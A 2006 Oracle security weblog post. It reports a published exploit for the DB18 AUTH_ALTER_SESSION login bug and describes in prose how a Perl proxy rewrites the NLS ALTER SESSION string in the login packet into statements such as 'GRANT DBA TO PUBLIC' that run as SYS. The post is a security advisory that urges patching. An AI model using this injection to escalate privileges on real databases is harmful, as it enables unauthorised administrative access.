Auditing an Oracle database for security issues is very important. provides all of the information and tools that you will need Click here for details of Limited's detailed Oracle database security audit service Click here for details of Limited's Oracle Security Training Courses
There are 45 visitors online    
Cookie Policy:We only use essential cookies on small sections of this website. For details see here.

Pete Finnigan's Oracle security weblog

Home » Archives » February 2006 » exploit code released for the DB18 AUTH_ALTER_SESSION bug - how to make any user a DBA

[Previous entry: "How to connect to the database using Perl - with two way communication"] [Next entry: " is available"]

exploit code released for the DB18 AUTH_ALTER_SESSION bug - how to make any user a DBA

February 1st, 2006 by Pete

I just found this page on René Nyffenegger's website. The page is dated 24th January, so it has been there for a week or so. I have not seen anyone else pick up on this yet though, that is not to say theyt have not done so. The page is titled "On a breakable Oracle" and it describes in detail how to exploit the DB18 bug that Imperva found in the TNS / O3Logon process. This is where after verifying the user/password the Oracle client sends strings such as ALTER SESSION SET NLS_LANGUAGE='%s". The guys at Imperva discovered that these strings can be replaced by any other valid string such as GRANT DBA TO PUBLIC. The key to the issue is that in an un-patched system these statements are executed as SYS.

René details a Perl script that uses a Perl proxy that he also provides. He creates an Oracle suer with nothing but CREATE SESSION and then proceeds to grab the packets as they are sent to the database as part of an authorisation. He finds the string ALTER SESSION SET NLS_... and then works out its position in the packet and also the string end identifier. René then presents another perl script that also uses his proxy but this time the Perl script intercepts the packet and replaces the ALTER SESSION SET NLS... with the code to create a new user. He then starts his proxy and injects the code and connects to SQL*plus as his simple user. The trick is then repeated to grant DBA to this user. A final check in the data dictionary confirms that it has worked.

This is quite a complex exploit to demonstrate how this could work. It can be done much more simply.

As René points out in his article, patch immediately!!

February 2006

This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.

Weblog Home
Weblog Archives

Oracle Security Tools page
Oracle security papers
Oracle Security alerts

Web Development
SQL Server Security

Atom 0.3 FEED
Powered by gm-rss 2.0.0

Valid XHTML 1.0!